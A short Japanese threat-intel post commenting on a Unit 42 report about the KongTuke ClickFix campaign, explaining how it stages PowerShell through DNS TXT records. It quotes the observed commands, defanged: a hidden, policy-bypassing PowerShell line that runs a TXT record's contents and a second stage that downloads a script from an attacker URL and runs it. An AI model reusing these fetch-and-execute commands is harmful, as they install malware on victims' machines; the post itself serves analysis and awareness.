やり方自体は新しいものでは無いが、Clickfixでも使われるようになったんだなぁ。

最近のClickfixは、コマンドを良い感じに分かりにくくするあらゆる方向で頑張っているイメージ。

We discovered the #KongTuke campaign using #DNS TXT records in its #ClickFix script. These DNS TXT records staged a command to retrieve and run a PowerShell script. We continue to monitor ClickFix campaigns for any future occurrences. Details at https://t.co/nU4KHPPlk5 pic.twitter.com/JGIMcpyrlk

— Unit 42 (@Unit42_Intel) 2026年2月4日

Resolve-DnsName -Type TXT

観測されたコマンド

"C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -ep bypass -c 
"iex((Resolve-DnsName -Type TXT payload.bruemald[.]top -Server 8.8.8[.]8).Strings -join ")"

# https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-02-03-IOCs-from-KongTuke-ClickFix-activity.txt?utm_campaign=tti_clickfix_kongtuke

iexにはpowershellスクリプトを渡すイメージだが、そこに繋がるコマンドとしてResolve-DnsNameを使っている。

Resolve-DnsNameで読み込んだTXTレコードが、powershellコマンドとなる。

読み込まれるpowershellスクリプト↓

irm 'hxxps[:]//hermisron[.]com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037'|iex

Invoke-RestMethodで引っ張ってきたものをiexで読み込む。

今後もClickfixは頑張っていくのだろう

既にフィッシング、サポート詐欺、Clickfixぐらいの3大侵入口くらい、今後も無くならないくらいの影響力だよなぁ。